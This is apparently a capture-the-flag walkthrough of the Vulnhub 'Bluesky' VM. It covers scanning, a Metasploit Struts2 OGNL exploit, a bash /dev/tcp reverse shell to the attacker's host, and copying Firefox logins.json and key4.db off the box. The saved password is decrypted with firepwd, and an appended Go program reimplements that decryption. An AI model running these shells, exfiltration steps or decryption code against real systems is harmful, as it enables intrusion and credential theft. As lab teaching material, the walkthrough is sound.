Bluesky
Identifying the target host's IP address
This VM cannot obtain an IP address automatically under VirtualBox; the fix is described in another post of mine and is not repeated here.
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ sudo netdiscover -i eth
Currently scanning: 192.168.59.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:81:a1:ab 1 60 PCS Systemtechnik GmbH
192.168.56.115 08:00:27:47:f4:47 1 60 PCS Systemtechnik GmbH
The netdiscover tool that ships with Kali Linux identifies the target host's IP address as 192.168.56.115.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.115 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-13 21:55 EST
Nmap scan report for localhost (192.168.56.115)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 19:45:ec:5c:59:46:c8:26:b5:a3:30:d9:2f:79:ac:85 (RSA)
| 256 18:d1:aa:64:f7:f3:6f:8c:91:82:09:57:0f:07:d2:d2 (ECDSA)
|_ 256 8e:50:a9:c7:1b:23:e2:68:56:0f:fa:59:2a:0a:e0:3e (ED25519)
8080/tcp open http Apache Tomcat 9.0.40
|_http-title: Apache Tomcat/9.0.40
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 08:00:27:47:F4:47 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.84 seconds
Get Access
The target host has two open ports: 22 (SSH) and 8080 (HTTP). Since the SSH service has no exploitable vulnerability, information gathering next focuses on the HTTP service:
Opening port 8080 in the browser bundled with Kali Linux returns the Tomcat default page:
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ curl http://192.168.56.115:8080/robots.txt
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/robots.txt] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.40</h3></body></html>
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ gobuster dir -u http://192.168.56.115:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.115:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/13 21:59:50 Starting gobuster in directory enumeration mode
===============================================================
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/manager (Status: 302) [Size: 0] [--> /manager/]
/http%3A%2F%2Fwww (Status: 400) [Size: 804]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 804]
/http%3A%2F%2Fblogs (Status: 400) [Size: 804]
/http%3A%2F%2Fblog (Status: 400) [Size: 804]
/**http%3A%2F%2Fwww (Status: 400) [Size: 804]
/External%5CX-News (Status: 400) [Size: 795]
/http%3A%2F%2Fcommunity (Status: 400) [Size: 804]
/http%3A%2F%2Fradar (Status: 400) [Size: 804]
/http%3A%2F%2Fjeremiahgrossman (Status: 400) [Size: 804]
/http%3A%2F%2Fweblog (Status: 400) [Size: 804]
/http%3A%2F%2Fswik (Status: 400) [Size: 804]
===============================================================
2022/11/13 22:00:43 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ dirb http://192.168.56.115:8080
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Nov 13 22:39:01 2022
URL_BASE: http://192.168.56.115:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.115:8080/ ----
+ http://192.168.56.115:8080/docs (CODE:302|SIZE:0)
+ http://192.168.56.115:8080/examples (CODE:302|SIZE:0)
+ http://192.168.56.115:8080/favicon.ico (CODE:200|SIZE:21630)
+ http://192.168.56.115:8080/host-manager (CODE:302|SIZE:0)
+ http://192.168.56.115:8080/manager (CODE:302|SIZE:0)
-----------------
END_TIME: Sun Nov 13 22:39:04 2022
DOWNLOADED: 4612 - FOUND: 5
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ curl http://192.168.56.115:8080/manager/
Directory scanning did identify /manager/, but requesting that directory returns nothing.
Checking how others approached this box: they say the Struts installation on this VM is vulnerable.
Struts2 is a web framework under the Apache project.
The vulnerability affects Struts 2.0 and later; it is a remote command execution vulnerability and an open redirect. By exploiting it, an attacker can mount a remote attack, not only stealing the site's data but even taking control of the web server.
Oddly, the earlier directory scans did not reveal struts2 at all.
msf6 > search struts
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/struts_default_action_mapper 2013-07-02 excellent Yes Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
1 exploit/multi/http/struts_dev_mode 2012-01-06 excellent Yes Apache Struts 2 Developer Mode OGNL Execution
2 exploit/multi/http/struts2_multi_eval_ognl 2020-09-14 excellent Yes Apache Struts 2 Forced Multi OGNL Evaluation
3 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
4 exploit/multi/http/struts2_rest_xstream 2017-09-05 excellent Yes Apache Struts 2 REST Plugin XStream RCE
5 exploit/multi/http/struts2_code_exec_showcase 2017-07-07 excellent Yes Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution
6 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution
7 exploit/multi/http/struts_dmi_exec 2016-04-27 excellent Yes Apache Struts Dynamic Method Invocation Remote Code Execution
8 exploit/multi/http/struts2_content_type_ognl 2017-03-07 excellent Yes Apache Struts Jakarta Multipart Parser OGNL Injection
9 exploit/multi/http/struts_code_exec_parameters 2011-10-01 excellent Yes Apache Struts ParametersInterceptor Remote Code Execution
10 exploit/multi/http/struts_dmi_rest_exec 2016-06-01 excellent Yes Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution
11 exploit/multi/http/struts_code_exec 2010-07-13 good No Apache Struts Remote Command Execution
12 exploit/multi/http/struts_code_exec_exception_delegator 2012-01-06 excellent No Apache Struts Remote Command Execution
13 exploit/multi/http/struts_include_params 2013-05-24 great Yes Apache Struts includeParams Remote Code Execution
14 auxiliary/scanner/http/log4shell_scanner 2021-12-09 normal No Log4Shell HTTP Scanner
Interact with a module by name or index. For example info 14, use 14 or use auxiliary/scanner/http/log4shell_scanner
msf6 > use exploit/multi/http/struts2_code_exec_showcase
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/struts2_code_exec_showcase) > show options
Module options (exploit/multi/http/struts2_code_exec_showcase):
Name Current Setting Required Description
---- --------------- -------- -----------
POSTPARAM name yes The HTTP POST parameter
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wik
i/Using-Metasploit
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /struts2-showcase/integration/saveGangste yes The path to a struts application action
r.action
VHOST no HTTP server virtual host
Payload options (cmd/unix/python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Universal
msf6 exploit(multi/http/struts2_code_exec_showcase) > set RHOSTS 192.168.56.115
RHOSTS => 192.168.56.115
msf6 exploit(multi/http/struts2_code_exec_showcase) > set LHOST 192.168.56.107
LHOST => 192.168.56.107
msf6 exploit(multi/http/struts2_code_exec_showcase) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/http/struts2_code_exec_showcase) > exploit
[*] Started reverse TCP handler on 192.168.56.107:5555
[+] Command executed
msf6 exploit(multi/http/struts2_code_exec_showcase) > show options
Module options (exploit/multi/http/struts2_code_exec_showcase):
Name Current Setting Required Description
---- --------------- -------- -----------
POSTPARAM name yes The HTTP POST parameter
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.115 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wik
i/Using-Metasploit
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /struts2-showcase/integration/saveGangste yes The path to a struts application action
r.action
VHOST no HTTP server virtual host
Payload options (cmd/unix/python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.107 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Universal
msf6 exploit(multi/http/struts2_code_exec_showcase) > set payload /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
msf6 exploit(multi/http/struts2_code_exec_showcase) > set payload cmd/unix/
cmd/unix/reverse_tclsh
set payload cmd/unix/python/pingback_bind_tcp set payload cmd/unix/reverse_zsh
msf6 exploit(multi/http/struts2_code_exec_showcase) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf6 exploit(multi/http/struts2_code_exec_showcase) > show options
Module options (exploit/multi/http/struts2_code_exec_showcase):
Name Current Setting Required Description
---- --------------- -------- -----------
POSTPARAM name yes The HTTP POST parameter
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.115 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wik
i/Using-Metasploit
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /struts2-showcase/integration/saveGangste yes The path to a struts application action
r.action
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.107 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Universal
msf6 exploit(multi/http/struts2_code_exec_showcase) > run
[*] Started reverse TCP handler on 192.168.56.107:5555
[*] Command shell session 1 opened (192.168.56.107:5555 -> 192.168.56.115:57714) at 2022-11-13 22:51:19 -0500
id
[-] Exploit aborted due to failure: unknown: Exploit failed.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/struts2_code_exec_showcase) > id
[*] exec: id
uid=0(root) gid=0(root) groups=0(root)
msf6 exploit(multi/http/struts2_code_exec_showcase) > shell
[-] Unknown command: shell
msf6 exploit(multi/http/struts2_code_exec_showcase) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.168.56.107:5555 -> 192.168.56.115:57714 (192.168.56.115)
msf6 exploit(multi/http/struts2_code_exec_showcase) > sessions 1
[*] Starting interaction with 1...
id
uid=1000(minhtuan) gid=1000(minhtuan) groups=1000(minhtuan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
bash -c 'bash -i >& /dev/tcp/192.168.56.107/6666 0>&1'
After obtaining the shell, I spawn a separate one as well, in case the first is unstable.
└─$ sudo nc -nlvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.115] 37544
bash: cannot set terminal process group (648): Inappropriate ioctl for device
bash: no job control in this shell
minhtuan@ubuntu:~$ id
id
uid=1000(minhtuan) gid=1000(minhtuan) groups=1000(minhtuan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
minhtuan@ubuntu:~$ ls
ls
Desktop
Documents
Downloads
Music
myWebApp
Pictures
Public
struts2
Templates
user.txt
velocity.log
Videos
minhtuan@ubuntu:~$ cat user.txt
cat user.txt
Try your best, you have passed the first challenge, and the last one is for you, root me!
minhtuan@ubuntu:~$
Privilege escalation
Searching online shows that Firefox stores saved usernames and passwords in logins.json (version 32.0 and earlier) or signons.sqlite.
minhtuan@ubuntu:~/.mozilla$ find / -name logins.json 2>/dev/null
find / -name logins.json 2>/dev/null
/home/minhtuan/.mozilla/firefox/fvbljmev.default-release/logins.json
The file is encrypted, so a tool is needed to recover its contents.
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ git clone https://github.com/lclevy/firepwd.git
Cloning into 'firepwd'...
remote: Enumerating objects: 88, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 88 (delta 2), reused 3 (delta 0), pack-reused 80
Receiving objects: 100% (88/88), 239.08 KiB | 383.00 KiB/s, done.
Resolving deltas: 100% (41/41), done.
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ ls
firepwd nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ cd firepwd
┌──(kali㉿kali)-[~/Vulnhub/Bluesky/firepwd]
└─$ ls
firepwd.py LICENSE mozilla_db mozilla_pbe.pdf mozilla_pbe.svg readme.md requirements.txt
┌──(kali㉿kali)-[~/Vulnhub/Bluesky/firepwd]
└─$ pip -r requirements.txt
Usage:
pip <command> [options]
no such option: -r
┌──(kali㉿kali)-[~/Vulnhub/Bluesky/firepwd]
└─$ pip install -r requirements.txt
Start an HTTP server on the target and download logins.json and key4.db to Kali Linux:
<firefox/fvbljmev.default-release$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 ...
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ wget http://192.168.56.115:8000/logins.json
--2022-11-13 23:08:51-- http://192.168.56.115:8000/logins.json
Connecting to 192.168.56.115:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 660 [application/json]
Saving to: ‘logins.json’
logins.json 100%[==================================================================>] 660 --.-KB/s in 0.02s
2022-11-13 23:08:51 (35.8 KB/s) - ‘logins.json’ saved [660/660]
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ wget http://192.168.56.115:8000/key4.db
--2022-11-13 23:08:57-- http://192.168.56.115:8000/key4.db
Connecting to 192.168.56.115:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 294912 (288K) [application/octet-stream]
Saving to: ‘key4.db’
key4.db 100%[==================================================================>] 288.00K --.-KB/s in 0.04s
2022-11-13 23:08:57 (7.60 MB/s) - ‘key4.db’ saved [294912/294912]
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ ls
firepwd key4.db logins.json nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Bluesky/firepwd]
└─$ python firepwd.py
globalSalt: b'5932ff5878417b64a4049f8d9ce7b3ab247fde15'
SEQUENCE {
  SEQUENCE {
    OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
    SEQUENCE {
      SEQUENCE {
        OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
        SEQUENCE {
          OCTETSTRING b'5a7912074f9ddf6b381316126704a5479794dcf75aca047f45e2b54b3f0e6d79'
          INTEGER b'01'
          INTEGER b'20'
          SEQUENCE {
            OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
          }
        }
      }
      SEQUENCE {
        OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
        OCTETSTRING b'7366afcc6bf9cacc1fa25fa3961a'
      }
    }
  }
  OCTETSTRING b'1c74cace1e1e37252aea0d28aafb2399'
}
clearText b'70617373776f72642d636865636b0202'
password check? True
SEQUENCE {
  SEQUENCE {
    OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
    SEQUENCE {
      SEQUENCE {
        OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
        SEQUENCE {
          OCTETSTRING b'c0c32a0189ed3b0db160c739a54c821da4fd5572d3ee79cb36533bc7d11a49d0'
          INTEGER b'01'
          INTEGER b'20'
          SEQUENCE {
            OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
          }
        }
      }
      SEQUENCE {
        OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
        OCTETSTRING b'4b11e722902bc3a1bf51be57de22'
      }
    }
  }
  OCTETSTRING b'c6158b0d1e7a81ce468f9d24624daa581ee8095b6f4596242ef2dbf30b300b5b'
}
clearText b'540b76c41a46b9dcecc4c15449c785011546bcf84cfe9b700808080808080808'
decrypting login/password pairs
https://twitter.com:b'minhtuan',b'skysayohyeah'
This yields the username and password: minhtuan and skysayohyeah.
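The firepwd dump above shows every parameter of the key4.db scheme (globalSalt, PBKDF2 entrySalt with iteration count 1 and a 32-byte key, HMAC-SHA256, a 14-byte AES-CBC IV fragment and the ciphertext), but the post does not explain how those values become the two clearText lines. The Go program below is an added example, not part of the original post and not firepwd's own code: it re-derives both clearText values from the printed parameters using only the standard library, so the reader can see what "password check? True" means and where the 24-byte 3DES key that protects logins.json comes from. The sample values are copied from the dump above; the key schedule (SHA-1 of globalSalt plus master password, then PBKDF2-HMAC-SHA256, then AES-256-CBC with the DER header bytes 04 0e prepended to the IV) is the NSS PBES2 scheme as firepwd implements it, and an empty master password is assumed because that is the Firefox default and is what the dump was produced with.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// pbes2Item holds what firepwd prints for one key4.db entry: the PBKDF2 entrySalt,
// iteration count and key length, the 14-byte IV fragment and the final OCTETSTRING.
type pbes2Item struct {
	EntrySalt             []byte
	Iterations, KeyLength int
	IV14                  []byte // DER header bytes 04 0e are prepended to form the 16-byte IV
	Ciphertext            []byte
}

// mustHex decodes the constant sample data below (never user input), so the error is ignored.
func mustHex(s string) []byte { b, _ := hex.DecodeString(s); return b }

// Constructed sample: values copied from the firepwd dump above.
var (
	globalSalt = mustHex("5932ff5878417b64a4049f8d9ce7b3ab247fde15")
	// metaData item2: the "password-check" blob (iterations 1, key length 0x20)
	passwordCheck = pbes2Item{mustHex("5a7912074f9ddf6b381316126704a5479794dcf75aca047f45e2b54b3f0e6d79"),
		1, 32, mustHex("7366afcc6bf9cacc1fa25fa3961a"), mustHex("1c74cace1e1e37252aea0d28aafb2399")}
	// nssPrivate a11: the wrapped 3DES key for logins.json
	wrappedKey = pbes2Item{mustHex("c0c32a0189ed3b0db160c739a54c821da4fd5572d3ee79cb36533bc7d11a49d0"),
		1, 32, mustHex("4b11e722902bc3a1bf51be57de22"),
		mustHex("c6158b0d1e7a81ce468f9d24624daa581ee8095b6f4596242ef2dbf30b300b5b")}
)

// pbkdf2SHA256 is RFC 8018 PBKDF2 with HMAC-SHA256, written out so no x/crypto is needed.
func pbkdf2SHA256(password, salt []byte, iter, keyLen int) []byte {
	var out []byte
	for block := uint32(1); len(out) < keyLen; block++ {
		mac := hmac.New(sha256.New, password)
		mac.Write(salt)
		mac.Write([]byte{byte(block >> 24), byte(block >> 16), byte(block >> 8), byte(block)})
		u := mac.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < iter; i++ {
			mac = hmac.New(sha256.New, password)
			mac.Write(u)
			u = mac.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// decryptItem applies the NSS key schedule that firepwd implements:
// key = PBKDF2-HMAC-SHA256(SHA1(globalSalt || masterPassword), entrySalt, iter, keyLen),
// then AES-256-CBC with IV = 04 0e || IV14. An empty masterPassword is the Firefox default.
func decryptItem(it pbes2Item, globalSalt, masterPassword []byte) ([]byte, error) {
	seed := sha1.Sum(append(append([]byte{}, globalSalt...), masterPassword...))
	key := pbkdf2SHA256(seed[:], it.EntrySalt, it.Iterations, it.KeyLength)
	iv := append([]byte{0x04, 0x0e}, it.IV14...)
	block, err := aes.NewCipher(key)
	if err != nil || len(iv) != aes.BlockSize || len(it.Ciphertext) == 0 || len(it.Ciphertext)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("bad key, IV or ciphertext length")
	}
	out := make([]byte, len(it.Ciphertext))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(out, it.Ciphertext)
	return out, nil
}

// checkMasterPassword mirrors firepwd's "password check?". Success with an empty
// master password means the saved logins are protected by file permissions alone.
func checkMasterPassword(it pbes2Item, globalSalt, masterPassword []byte) bool {
	pt, err := decryptItem(it, globalSalt, masterPassword)
	return err == nil && string(pt) == "password-check\x02\x02"
}

// unwrapKey strips the PKCS#7 padding from the decrypted nssPrivate item, leaving
// the 24-byte 3DES key that protects the entries in logins.json.
func unwrapKey(it pbes2Item, globalSalt, masterPassword []byte) ([]byte, error) {
	pt, err := decryptItem(it, globalSalt, masterPassword)
	if err != nil {
		return nil, err
	}
	if pad := int(pt[len(pt)-1]); pad >= 1 && pad <= aes.BlockSize {
		return pt[:len(pt)-pad], nil
	}
	return nil, fmt.Errorf("bad PKCS#7 padding")
}

func main() {
	fmt.Println("empty master password accepted:", checkMasterPassword(passwordCheck, globalSalt, nil))
	key, err := unwrapKey(wrappedKey, globalSalt, nil)
	fmt.Printf("3DES key: %x %v\n", key, err)
}
```

The two things worth noticing for a defender are both visible in the dump and reproduced here: the iteration count is 1, so PBKDF2 adds essentially no work, and with no master (primary) password set the only secret input is the globalSalt stored in the same key4.db file. Anyone who can read the profile directory can therefore recover every saved login offline, which is exactly what happened on this box; setting a primary password in Firefox, or keeping the profile on an encrypted volume with tight permissions, is what turns this from a file read into a real brute-force problem.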
From: https://www.cnblogs.com/jason-huawen/p/16888645.html